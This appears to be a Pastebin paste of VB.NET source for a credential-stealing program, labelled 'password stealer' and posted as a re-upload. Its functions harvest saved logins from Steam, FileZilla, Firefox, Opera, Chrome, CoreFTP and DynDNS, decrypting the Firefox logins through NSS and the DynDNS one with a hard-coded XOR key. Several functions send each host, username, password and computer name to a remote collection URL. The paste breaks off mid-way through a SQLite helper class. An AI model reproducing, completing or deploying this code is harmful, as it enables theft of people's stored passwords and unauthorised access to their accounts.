API tools faq
paste
calfred2808

password stealer

calfred2808
May 5th, 2019
250
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 51.30 KB | None | 0 0
raw download clone embed print report
  1. vb.net password stealer source(re-upload)
  2.  
  3.  
  4.  
  5. 'Steam username Stealer
  6.  
  7. Public Shared Function GetSteamUsername() As Object
  8. Dim obj2 As Object
  9. Dim num2 As Integer
  10. Try
  11. Dim num3 As Integer
  12. Label_0000:
  13. ProjectData.ClearProjectError
  14. Dim num As Integer = 1
  15. Label_0008:
  16. num3 = 2
  17. Dim str2 As String = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\Valve\Steam", "SteamPath", ""))
  18. Label_002F:
  19. num3 = 3
  20. Dim file As String = (str2 & "\config\SteamAppData.vdf")
  21. Label_003E:
  22. num3 = 4
  23. Dim strArray As String() = MyProject.Computer.FileSystem.ReadAllText(file).Split(New Char() { """"c })
  24. Label_0067:
  25. num3 = 5
  26. If (strArray(9) = "") Then
  27. goto Label_0099
  28. End If
  29. Label_007C:
  30. num3 = 6
  31. strArray(9) = strArray(9)
  32. Label_0087:
  33. num3 = 7
  34. obj2 = strArray(9)
  35. goto Label_0131
  36. Label_0099:
  37. num3 = 9
  38. Label_009D:
  39. num3 = 10
  40. obj2 = Nothing
  41. goto Label_0131
  42. Label_00AD:
  43. num2 = 0
  44. Select Case (num2 + 1)
  45. Case 1
  46. goto Label_0000
  47. Case 2
  48. goto Label_0008
  49. Case 3
  50. goto Label_002F
  51. Case 4
  52. goto Label_003E
  53. Case 5
  54. goto Label_0067
  55. Case 6
  56. goto Label_007C
  57. Case 7
  58. goto Label_0087
  59. Case 8, 11, 12
  60. goto Label_0131
  61. Case 9
  62. goto Label_0099
  63. Case 10
  64. goto Label_009D
  65. Case Else
  66. goto Label_0126
  67. End Select
  68. Label_00EF:
  69. num2 = num3
  70. Select Case num
  71. Case 0
  72. goto Label_0126
  73. Case 1
  74. goto Label_00AD
  75. End Select
  76. Catch obj1 As Object When (?)
  77. ProjectData.SetProjectError(DirectCast(obj1, Exception))
  78. goto Label_00EF
  79. End Try
  80. Label_0126:
  81. Throw ProjectData.CreateProjectError(-2146828237)
  82. Label_0131:
  83. If (num2 <> 0) Then
  84. ProjectData.ClearProjectError
  85. End If
  86. Return obj2
  87. End Function
  88.  
  89.  
  90. 'Filezilla Password Stealer
  91.  
  92.  
  93. Public Shared Function GetFZ() As String
  94. Dim document As New XmlDocument
  95. Dim left As Object = Nothing
  96. Dim str As String = ""
  97. Dim path As String = (Interaction.Environ("appdata") & "\FileZilla\recentservers.xml")
  98. If File.Exists(path) Then
  99. Try
  100. document.Load(path)
  101. Dim elementsByTagName As XmlNodeList = document.GetElementsByTagName("Host")
  102. Dim list As XmlNodeList = document.GetElementsByTagName("Port")
  103. Dim list2 As XmlNodeList = document.GetElementsByTagName("User")
  104. Dim list3 As XmlNodeList = document.GetElementsByTagName("Pass")
  105. Dim num2 As Integer = (elementsByTagName.Count - 1)
  106. Dim i As Integer = 0
  107. Do While (i <= num2)
  108. left = Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(left, "Application: FileZilla"), ChrW(13) & ChrW(10)), "Host: "), elementsByTagName.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Port: "), list.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Username: "), list2.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), "Password: "), list3.ItemOf(i).InnerText), ChrW(13) & ChrW(10)), ChrW(13) & ChrW(10))
  109. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=15&u=", elementsByTagName.ItemOf(i).InnerText, "&l=", list2.ItemOf(i).InnerText, "&p=", list3.ItemOf(i).InnerText, "&c=", MyProject.Computer.Name.ToString }))
  110. i += 1
  111. Loop
  112. str = Conversions.ToString(left)
  113. Catch exception1 As Exception
  114. ProjectData.SetProjectError(exception1)
  115. ProjectData.ClearProjectError
  116. End Try
  117. End If
  118. Return str
  119. End Function
  120.  
  121.  
  122. 'Firefox Password Stealer
  123.  
  124.  
  125. Public Shared Sub GetFF()
  126. Dim str4 As String = Nothing
  127. Dim enumerator As IEnumerator
  128. Dim enumerator2 As IEnumerator
  129. Dim flag As Boolean = False
  130. Dim str2 As String = (Environment.GetFolderPath(SpecialFolder.ProgramFiles) & "\Mozilla Firefox\")
  131. Dim str5 As String
  132. For Each str5 In Directory.GetDirectories((Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\Mozilla\Firefox\Profiles"))
  133. If flag Then
  134. Exit For
  135. End If
  136. Dim str6 As String
  137. For Each str6 In Directory.GetFiles(str5)
  138. If Not flag Then
  139. If Regex.IsMatch(str6, "signons.sqlite") Then
  140. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.oivGmTktmoB(str5)
  141. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.heria = str6
  142. End If
  143. Else
  144. ProjectData.EndApp
  145. Exit For
  146. End If
  147. Next
  148. Next
  149. Dim heria As String = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.heria
  150. Dim item2 As New TSECItem
  151. Dim result As New TSECItem
  152. Dim item As New TSECItem
  153. Dim base2 As New Base(heria)
  154. Dim table As DataTable = base2.ExecuteQuery("SELECT * FROM moz_logins;")
  155. Dim table2 As DataTable = base2.ExecuteQuery("SELECT * FROM moz_disabledHosts;")
  156. Try
  157. enumerator = table2.Rows.GetEnumerator
  158. Do While enumerator.MoveNext
  159. Dim current As DataRow = DirectCast(enumerator.Current, DataRow)
  160. str4 = (str4 & Environment.NewLine & "hostname".ToString)
  161. Loop
  162. Finally
  163. If TypeOf enumerator Is IDisposable Then
  164. TryCast(enumerator,IDisposable).Dispose
  165. End If
  166. End Try
  167. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.OMhwbbbdVrvk(QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.bvryeuuo, True, 0)
  168. Try
  169. enumerator2 = table.Rows.GetEnumerator
  170. Do While enumerator2.MoveNext
  171. Dim buffer2 As Byte()
  172. Dim row2 As DataRow = DirectCast(enumerator2.Current, DataRow)
  173. str4 = (str4 & Environment.NewLine & "Application: FireFox")
  174. Dim str7 As String = Convert.ToString(row2.Item("formSubmitURL").ToString)
  175. str4 = (str4 & Environment.NewLine & "URL: " & str7)
  176. Dim inStr As New StringBuilder(row2.Item("encryptedUsername").ToString)
  177. Dim num3 As Integer = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.xSGTjizteYUcgxxr(IntPtr.Zero, IntPtr.Zero, inStr, inStr.Length)
  178. Dim ptr As New IntPtr(num3)
  179. Dim data As TSECItem = DirectCast(Marshal.PtrToStructure(ptr, GetType(TSECItem)), TSECItem)
  180. If ((QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.CqSzxpvjJWBHufugp(data, result, 0) = 0) AndAlso (result.SECItemLen <> 0)) Then
  181. buffer2 = New Byte(((result.SECItemLen - 1) + 1) - 1) {}
  182. ptr = New IntPtr(result.SECItemData)
  183. Marshal.Copy(ptr, buffer2, 0, result.SECItemLen)
  184. str4 = (str4 & Environment.NewLine & "Username: " & Encoding.ASCII.GetString(buffer2))
  185. End If
  186. Dim builder As New StringBuilder(row2.Item("encryptedPassword").ToString)
  187. Dim num2 As Integer = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.xSGTjizteYUcgxxr(IntPtr.Zero, IntPtr.Zero, builder, builder.Length)
  188. ptr = New IntPtr(num2)
  189. Dim item5 As TSECItem = DirectCast(Marshal.PtrToStructure(ptr, GetType(TSECItem)), TSECItem)
  190. If ((QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.CqSzxpvjJWBHufugp(item5, item, 0) = 0) AndAlso (item.SECItemLen <> 0)) Then
  191. Dim destination As Byte() = New Byte(((item.SECItemLen - 1) + 1) - 1) {}
  192. ptr = New IntPtr(item.SECItemData)
  193. Marshal.Copy(ptr, destination, 0, item.SECItemLen)
  194. str4 = String.Concat(New String() { str4, Environment.NewLine, "Passwort: ", Encoding.ASCII.GetString(destination), Environment.NewLine })
  195. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.FFString = str4
  196. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=10&u=", str7, "&l=", Encoding.ASCII.GetString(buffer2), "&p=", Encoding.ASCII.GetString(destination), "&c=", MyProject.Computer.Name.ToString }))
  197. End If
  198. Loop
  199. Finally
  200. If TypeOf enumerator2 Is IDisposable Then
  201. TryCast(enumerator2,IDisposable).Dispose
  202. End If
  203. End Try
  204. End Sub
  205.  
  206.  
  207.  
  208. 'Opera Password Stealer
  209.  
  210.  
  211. Public Shared Function GetOperaa() As String
  212. Dim str As String
  213. Dim list As New List(Of String)
  214. Dim strArray As String() = DirectCast(QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.DecryptInfo, String())
  215. Dim builder As New StringBuilder
  216. Dim str2 As String
  217. For Each str2 In strArray
  218. If (str2 <> "") Then
  219. list.Add(str2)
  220. End If
  221. Next
  222. If (list.Count = 0) Then
  223. Return " " & ChrW(13) & ChrW(10)
  224. End If
  225. Try
  226. Dim num3 As Integer = (list.Count - 1)
  227. Dim i As Integer = 0
  228. Do While (i <= num3)
  229. builder.Append("Application: Opera" & ChrW(13) & ChrW(10))
  230. builder.Append(("Host: " & list.Item(i).Substring(0) & ChrW(13) & ChrW(10)))
  231. builder.Append(("User Name: " & list.Item((i + 1)).Substring(1) & ChrW(13) & ChrW(10)))
  232. builder.Append(("Password: " & list.Item((i + 2)).Substring(1) & ChrW(13) & ChrW(10) & ChrW(13) & ChrW(10)))
  233. Dim str3 As String = list.Item(i).Substring(1)
  234. Dim str5 As String = list.Item((i + 1)).Substring(1)
  235. Dim str4 As String = list.Item((i + 2)).Substring(1)
  236. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=13&u=", str3, "&l=", str5, "&p=", str4, "&c=", MyProject.Computer.Name.ToString }))
  237. i = (i + 3)
  238. Loop
  239. str = builder.ToString
  240. Catch exception1 As Exception
  241. ProjectData.SetProjectError(exception1)
  242. ProjectData.ClearProjectError
  243. End Try
  244. Return str
  245. End Function
  246.  
  247.  
  248.  
  249. 'Google Chrome Password Stealer
  250.  
  251. [php]
  252. Public Shared Function GetChrome() As Object
  253. Dim obj2 As Object
  254. Dim baseName As String = (Environment.GetFolderPath(SpecialFolder.LocalApplicationData) & "\Google\Chrome\User Data\Default\Login Data")
  255. Try
  256. Dim instance As Object = New SQLiteHandler(baseName)
  257. NewLateBinding.LateCall(instance, Nothing, "ReadTable", New Object() { "logins" }, Nothing, Nothing, Nothing, True)
  258. If Not File.Exists(baseName) Then
  259. Return obj2
  260. End If
  261. Dim num2 As Integer = Conversions.ToInteger(Operators.SubtractObject(NewLateBinding.LateGet(instance, Nothing, "GetRowCount", New Object(0 - 1) {}, Nothing, Nothing, Nothing), 1))
  262. Dim i As Integer = 0
  263. Do While (i <= num2)
  264. Dim arguments As Object() = New Object() { i, "origin_url" }
  265. Dim copyBack As Boolean() = New Boolean() { True, False }
  266. If copyBack(0) Then
  267. i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(arguments(0)), GetType(Integer)))
  268. End If
  269. Dim str5 As String = Conversions.ToString(NewLateBinding.LateGet(instance, Nothing, "GetValue", arguments, Nothing, Nothing, copyBack))
  270. Dim objArray As Object() = New Object() { i, "username_value" }
  271. copyBack = New Boolean() { True, False }
  272. If copyBack(0) Then
  273. i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray(0)), GetType(Integer)))
  274. End If
  275. Dim str2 As String = Conversions.ToString(NewLateBinding.LateGet(instance, Nothing, "GetValue", objArray, Nothing, Nothing, copyBack))
  276. Dim objArray3 As Object() = New Object(1 - 1) {}
  277. Dim obj4 As Object = instance
  278. arguments = New Object(2 - 1) {}
  279. arguments(0) = i
  280. Dim str6 As String = "password_value"
  281. arguments(1) = str6
  282. objArray = arguments
  283. copyBack = New Boolean() { True, False }
  284. If copyBack(0) Then
  285. i = CInt(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray(0)), GetType(Integer)))
  286. End If
  287. objArray3(0) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(obj4, Nothing, "GetValue", objArray, Nothing, Nothing, copyBack))
  288. Dim objArray4 As Object() = objArray3
  289. Dim flagArray2 As Boolean() = New Boolean() { True }
  290. If flagArray2(0) Then
  291. NewLateBinding.LateSetComplex(obj4, Nothing, "GetValue", New Object() { i, str6, RuntimeHelpers.GetObjectValue(objArray4(0)) }, Nothing, Nothing, True, False)
  292. End If
  293. Dim str4 As String = QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.Wegsada(DirectCast(NewLateBinding.LateGet(Encoding.Default, Nothing, "GetBytes", objArray4, Nothing, Nothing, flagArray2), Byte()))
  294. If ((str2 <> "") And (str4 <> "")) Then
  295. Dim item As String = String.Concat(New String() { "Application: Google Chrome" & ChrW(13) & ChrW(10) & "Host: ", str5, ChrW(13) & ChrW(10) & "Username: ", str2, ChrW(13) & ChrW(10) & "Password: ", str4, ChrW(13) & ChrW(10) })
  296. QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.ListBox1.Items.Add(item)
  297. New WebClient().DownloadString(String.Concat(New String() { QMBVMDQaKJwiKgsHoGrvWKICURnJhnjvyOj.URL, "?action=add&a=12&u=", str5, "&l=", str2, "&p=", str4, "&c=", MyProject.Computer.Name.ToString }))
  298. End If
  299. i += 1
  300. Loop
  301. Catch exception1 As Exception
  302. ProjectData.SetProjectError(exception1)
  303. ProjectData.ClearProjectError
  304. End Try
  305. Return obj2
  306. End Function
  307.  
  308.  
  309. 'CoreFTP Password Stealer
  310.  
  311.  
  312. Module CoreFTP
  313.     Function CoreFTP() As String
  314.         Dim sPath As String = Environ$("APPDATA") & "\CoreFTP\sites.idx"
  315.         Dim sFile As String = ReadFile(sPath)
  316.         Dim sHost As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Host")
  317.         Dim sPort As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Port")
  318.         Dim sUser As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\User")
  319.         Dim sPwd As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\PW")
  320.         Dim sEntry As String = RegRead("HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\" & sFile & "\Name")
  321.  
  322.         If Not sUser = "" Then
  323.             Try
  324.                 CoreFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  325.                 Dim nl As String = vbNewLine
  326.                 Form1.ztext.AppendText(nl)
  327.                 Form1.ztext.AppendText("============CoreFTP==============")
  328.                 Form1.ztext.AppendText(nl)
  329.                 Form1.ztext.AppendText("Entry: " & sEntry)
  330.                 Form1.ztext.AppendText(nl)
  331.                 Form1.ztext.AppendText("Host: " & sHost)
  332.                 Form1.ztext.AppendText(": " & sPort)
  333.                 Form1.ztext.AppendText(nl)
  334.                 Form1.ztext.AppendText("User: " & sUser)
  335.                 Form1.ztext.AppendText(nl)
  336.                 Form1.ztext.AppendText("Password: " & sPwd)
  337.                 Form1.ztext.AppendText("=============================")
  338.                 Form1.ztext.AppendText(nl)
  339.             Catch ex As Exception
  340.                 Form1.ztext.AppendText("============CoreFTP==============")
  341.                 Form1.ztext.AppendText(vbNewLine)
  342.                 Form1.ztext.AppendText("CoreFTP Couldn't Be Recovered!")
  343.                 Form1.ztext.AppendText(vbNewLine)
  344.                 Form1.ztext.AppendText("=================================")
  345.             End Try
  346.         Else
  347.         End If
  348.     End Function
  349. End Module
  350.  
  351.  
  352. 'DYN DNS Password Stealer
  353.  
  354.  
  355. Module Dyndns
  356.     Public Function GoogleDns() As String
  357.         On Error Resume Next
  358.         GoogleDns = Nothing
  359.  
  360.         Dim sAppData As String
  361.         Dim sPath As String
  362.         Dim sLine As String
  363.         Dim sUser As String = Nothing
  364.         Dim sPassword As String = Nothing
  365.         Dim i As Integer
  366.         Dim sChars As String = Nothing
  367.         Dim lPtr As Integer
  368.  
  369.         sAppData = Environ("ALLUSERSPROFILE")
  370.  
  371.         If Right(sAppData, 1) <> "\" Then sAppData = sAppData & "\"
  372.  
  373.         sPath = sAppData & "DynDNS\Updater\config.dyndns"
  374.  
  375.         'UPGRADE_WARNING: Dir has a new behavior. Click for more: 'ms-help://MS.VSCC.v90/dv_commoner/local/redirect.htm?keyword="9B7D5ADD-D8FE-4819-A36C-6DEDAF088CC7"'
  376.         If Dir(sPath) <> "" Then
  377.             FileOpen(1, sPath, OpenMode.Binary)
  378.             Do While Not EOF(1)
  379.                 sLine = vbNullString
  380.                 sLine = LineInput(1)
  381.                 If Left(sLine, 9) = "Username=" Then sUser = Mid(sLine, 10)
  382.                 If Left(sLine, 9) = "Password=" Then
  383.                     sPassword = Mid(sLine, 10)
  384.                     'We have what we want, now exit do
  385.                     Exit Do
  386.                 End If
  387.             Loop
  388.             FileClose(1)
  389.  
  390.             For i = 1 To Len(sPassword) Step 2
  391.                 sChars = sChars & Chr(Val("&H" & Mid(sPassword, i, 2)))
  392.             Next i
  393.  
  394.             For i = 1 To Len(sChars)
  395.                 Mid(sChars, i, 1) = Chr((Asc(Mid(sChars, i, 1))) Xor (Asc(Mid("t6KzXhCh", lPtr + 1, 1))))
  396.                 lPtr = ((lPtr + 1) Mod 8)
  397.             Next i
  398.             Dim nl As String = vbNewLine
  399.             Form1.ztext.AppendText(nl)
  400.             Form1.ztext.AppendText("============DYNDNS==============")
  401.             Form1.ztext.AppendText(nl)
  402.             Form1.ztext.AppendText("Username: " & sUser)
  403.             Form1.ztext.AppendText(nl)
  404.             Form1.ztext.AppendText("Password: " & sChars)
  405.             Form1.ztext.AppendText(nl)
  406.             Form1.ztext.AppendText("=============================")
  407.             Form1.ztext.AppendText(nl)
  408.             If sUser = "" Or sChars = "" Then
  409.                 Form1.ztext.AppendText(nl)
  410.                 Form1.ztext.AppendText("============DYNDNS==============")
  411.                 Form1.ztext.AppendText(nl)
  412.                 Form1.ztext.AppendText("DYNDNS Couldn't Be Recovered!")
  413.                 Form1.ztext.AppendText(nl)
  414.                 Form1.ztext.AppendText("=============================")
  415.                 Form1.ztext.AppendText(nl)
  416.             End If
  417.         End If
  418.     End Function
  419. End Module
  420.  
  421.  
  422. 'FF1 Password Stealer
  423.  
  424.  
  425. Imports System
  426. Imports System.IO
  427. Imports System.Runtime.InteropServices
  428. Imports System.Data
  429. Imports FireFox.SQLiteWrapper
  430. Imports System.Text
  431. Module FFDecryptor
  432.  
  433.     Public Class SHITEMID
  434.         Public Shared cb As Long
  435.         Public Shared abID As Byte()
  436.     End Class
  437.     <StructLayout(LayoutKind.Sequential)> _
  438.     Public Structure TSECItem
  439.         Public SECItemType As Integer
  440.         Public SECItemData As Integer
  441.         Public SECItemLen As Integer
  442.     End Structure
  443.  
  444.     <DllImport("kernel32.dll")> _
  445.     Private Function LoadLibrary(ByVal dllFilePath As String) As IntPtr
  446.     End Function
  447.     Private NSS3 As IntPtr
  448.     <DllImport("kernel32", CharSet:=CharSet.Ansi, ExactSpelling:=True, SetLastError:=True)> _
  449.     Private Function GetProcAddress(ByVal hModule As IntPtr, ByVal procName As String) As IntPtr
  450.     End Function
  451.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  452.     Public Delegate Function DLLFunctionDelegate(ByVal configdir As String) As Long
  453.     Public Function NSS_Init(ByVal configdir As String) As Long
  454.         Dim MozillaPath As String = Environment.GetEnvironmentVariable("PROGRAMFILES") & "\Mozilla Firefox\"
  455.         LoadLibrary(MozillaPath & "mozcrt19.dll")
  456.         LoadLibrary(MozillaPath & "nspr4.dll")
  457.         LoadLibrary(MozillaPath & "plc4.dll")
  458.         LoadLibrary(MozillaPath & "plds4.dll")
  459.         LoadLibrary(MozillaPath & "ssutil3.dll")
  460.         LoadLibrary(MozillaPath & "sqlite3.dll")
  461.         LoadLibrary(MozillaPath & "nssutil3.dll")
  462.         LoadLibrary(MozillaPath & "softokn3.dll")
  463.         NSS3 = LoadLibrary(MozillaPath & "nss3.dll")
  464.         Dim pProc As IntPtr = GetProcAddress(NSS3, "NSS_Init")
  465.         Dim dll As DLLFunctionDelegate = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate)), DLLFunctionDelegate)
  466.         Return dll(configdir)
  467.     End Function
  468.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  469.     Public Delegate Function DLLFunctionDelegate2() As Long
  470.     Public Function PK11_GetInternalKeySlot() As Long
  471.         Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11_GetInternalKeySlot")
  472.         Dim dll As DLLFunctionDelegate2 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate2)), DLLFunctionDelegate2)
  473.         Return dll()
  474.     End Function
  475.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  476.     Public Delegate Function DLLFunctionDelegate3(ByVal slot As Long, ByVal loadCerts As Boolean, ByVal wincx As Long) As Long
  477.     Public Function PK11_Authenticate(ByVal slot As Long, ByVal loadCerts As Boolean, ByVal wincx As Long) As Long
  478.         Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11_Authenticate")
  479.         Dim dll As DLLFunctionDelegate3 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate3)), DLLFunctionDelegate3)
  480.         Return dll(slot, loadCerts, wincx)
  481.     End Function
  482.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  483.     Public Delegate Function DLLFunctionDelegate4(ByVal arenaOpt As IntPtr, ByVal outItemOpt As IntPtr, ByVal inStr As StringBuilder, ByVal inLen As Integer) As Integer
  484.     Public Function NSSBase64_DecodeBuffer(ByVal arenaOpt As IntPtr, ByVal outItemOpt As IntPtr, ByVal inStr As StringBuilder, ByVal inLen As Integer) As Integer
  485.         Dim pProc As IntPtr = GetProcAddress(NSS3, "NSSBase64_DecodeBuffer")
  486.         Dim dll As DLLFunctionDelegate4 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate4)), DLLFunctionDelegate4)
  487.         Return dll(arenaOpt, outItemOpt, inStr, inLen)
  488.     End Function
  489.     <UnmanagedFunctionPointer(CallingConvention.Cdecl)> _
  490.     Public Delegate Function DLLFunctionDelegate5(ByRef data As TSECItem, ByRef result As TSECItem, ByVal cx As Integer) As Integer
  491.     Public Function PK11SDR_Decrypt(ByRef data As TSECItem, ByRef result As TSECItem, ByVal cx As Integer) As Integer
  492.         Dim pProc As IntPtr = GetProcAddress(NSS3, "PK11SDR_Decrypt")
  493.         Dim dll As DLLFunctionDelegate5 = DirectCast(Marshal.GetDelegateForFunctionPointer(pProc, GetType(DLLFunctionDelegate5)), DLLFunctionDelegate5)
  494.         Return dll(data, result, cx)
  495.     End Function
  496.     Public signon As String
  497. End Module
  498.  
  499.  
  500. 'FF2 Password Stealer
  501.  
  502.  
  503. Imports System
  504. Imports System.Collections.Generic
  505. Imports System.Text
  506. Imports System.Runtime.InteropServices
  507. Imports System.Data
  508. Imports System.Collections
  509.  
  510. Namespace SQLiteWrapper
  511.     Public Class SQLiteBase
  512.         <DllImport("kernel32")> _
  513.         Private Shared Function HeapAlloc(ByVal heap As IntPtr, ByVal flags As UInt32, ByVal bytes As UInt32) As IntPtr
  514.         End Function
  515.  
  516.         <DllImport("kernel32")> _
  517.         Private Shared Function GetProcessHeap() As IntPtr
  518.         End Function
  519.  
  520.         <DllImport("kernel32")> _
  521.         Private Shared Function lstrlen(ByVal str As IntPtr) As Integer
  522.         End Function
  523.         <DllImport("sqlite3")> _
  524.         Private Shared Function sqlite3_open(ByVal fileName As IntPtr, ByRef database As IntPtr) As Integer
  525.         End Function
  526.  
  527.         <DllImport("sqlite3")> _
  528.         Private Shared Function sqlite3_close(ByVal database As IntPtr) As Integer
  529.         End Function
  530.  
  531.         <DllImport("sqlite3")> _
  532.         Private Shared Function sqlite3_exec(ByVal database As IntPtr, ByVal query As IntPtr, ByVal callback As IntPtr, ByVal arguments As IntPtr, ByRef [error] As IntPtr) As Integer
  533.         End Function
  534.  
  535.         <DllImport("sqlite3")> _
  536.         Private Shared Function sqlite3_errmsg(ByVal database As IntPtr) As IntPtr
  537.         End Function
  538.  
  539.         <DllImport("sqlite3")> _
  540.         Private Shared Function sqlite3_prepare_v2(ByVal database As IntPtr, ByVal query As IntPtr, ByVal length As Integer, ByRef statement As IntPtr, ByRef tail As IntPtr) As Integer
  541.         End Function
  542.  
  543.         <DllImport("sqlite3")> _
  544.         Private Shared Function sqlite3_step(ByVal statement As IntPtr) As Integer
  545.         End Function
  546.  
  547.         <DllImport("sqlite3")> _
  548.         Private Shared Function sqlite3_column_count(ByVal statement As IntPtr) As Integer
  549.         End Function
  550.  
  551.         <DllImport("sqlite3")> _
  552.         Private Shared Function sqlite3_column_name(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  553.         End Function
  554.  
  555.         <DllImport("sqlite3")> _
  556.         Private Shared Function sqlite3_column_type(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Integer
  557.         End Function
  558.  
  559.         <DllImport("sqlite3")> _
  560.         Private Shared Function sqlite3_column_int(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Integer
  561.         End Function
  562.  
  563.         <DllImport("sqlite3")> _
  564.         Private Shared Function sqlite3_column_double(ByVal statement As IntPtr, ByVal columnNumber As Integer) As Double
  565.         End Function
  566.  
  567.         <DllImport("sqlite3")> _
  568.         Private Shared Function sqlite3_column_text(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  569.         End Function
  570.  
  571.         <DllImport("sqlite3")> _
  572.         Private Shared Function sqlite3_column_blob(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  573.         End Function
  574.  
  575.         <DllImport("sqlite3")> _
  576.         Private Shared Function sqlite3_column_table_name(ByVal statement As IntPtr, ByVal columnNumber As Integer) As IntPtr
  577.         End Function
  578.  
  579.         <DllImport("sqlite3")> _
  580.         Private Shared Function sqlite3_finalize(ByVal handle As IntPtr) As Integer
  581.         End Function
  582.  
  583.         ' SQLite constants
  584.         Private Const SQL_OK As Integer = 0
  585.         Private Const SQL_ROW As Integer = 100
  586.         Private Const SQL_DONE As Integer = 101
  587.         Public Enum SQLiteDataTypes
  588.             INT = 1
  589.             FLOAT
  590.             TEXT
  591.             BLOB
  592.             NULL
  593.         End Enum
  594.         Private database As IntPtr
  595.         Public Sub New()
  596.             database = IntPtr.Zero
  597.         End Sub
  598.         Public Sub New(ByVal baseName As [String])
  599.             OpenDatabase(baseName)
  600.         End Sub
  601.         Public Sub OpenDatabase(ByVal baseName As [String])
  602.             If sqlite3_open(StringToPointer(baseName), database) <> SQL_OK Then
  603.                 database = IntPtr.Zero
  604.                 Throw New Exception("Error with opening database " & baseName & "!")
  605.             End If
  606.         End Sub
  607.         Public Sub CloseDatabase()
  608.             If database <> IntPtr.Zero Then
  609.                 sqlite3_close(database)
  610.             End If
  611.         End Sub
  612.         Public Function GetTables() As ArrayList
  613.             Dim query As [String] = "SELECT name FROM sqlite_master " & "WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%'" & "UNION ALL " & "SELECT name FROM sqlite_temp_master " & "WHERE type IN ('table','view') " & "ORDER BY 1"
  614.             Dim table As DataTable = ExecuteQuery(query)
  615.             Dim list As New ArrayList()
  616.             For Each row As DataRow In table.Rows
  617.                 list.Add(row.ItemArray(0).ToString())
  618.             Next
  619.             Return list
  620.         End Function
  621.         Public Sub ExecuteNonQuery(ByVal query As [String])
  622.             Dim [error] As IntPtr
  623.             sqlite3_exec(database, StringToPointer(query), IntPtr.Zero, IntPtr.Zero, [error])
  624.             If [error] <> IntPtr.Zero Then
  625.                 Throw New Exception(("Error with executing non-query: """ & query & """!" & vbLf) + PointerToString(sqlite3_errmsg([error])))
  626.             End If
  627.         End Sub
  628.         Public Function ExecuteQuery(ByVal query As [String]) As DataTable
  629.             Dim statement As IntPtr
  630.             Dim excessData As IntPtr
  631.             sqlite3_prepare_v2(database, StringToPointer(query), GetPointerLenght(StringToPointer(query)), statement, excessData)
  632.             Dim table As New DataTable()
  633.             Dim result As Integer = ReadFirstRow(statement, table)
  634.             While result = SQL_ROW
  635.                 result = ReadNextRow(statement, table)
  636.             End While
  637.             sqlite3_finalize(statement)
  638.             Return table
  639.         End Function
  640.         Private Function ReadFirstRow(ByVal statement As IntPtr, ByRef table As DataTable) As Integer
  641.             table = New DataTable("resultTable")
  642.             Dim resultType As Integer = sqlite3_step(statement)
  643.             If resultType = SQL_ROW Then
  644.                 Dim columnCount As Integer = sqlite3_column_count(statement)
  645.                 Dim columnName As [String] = ""
  646.                 Dim columnType As Integer = 0
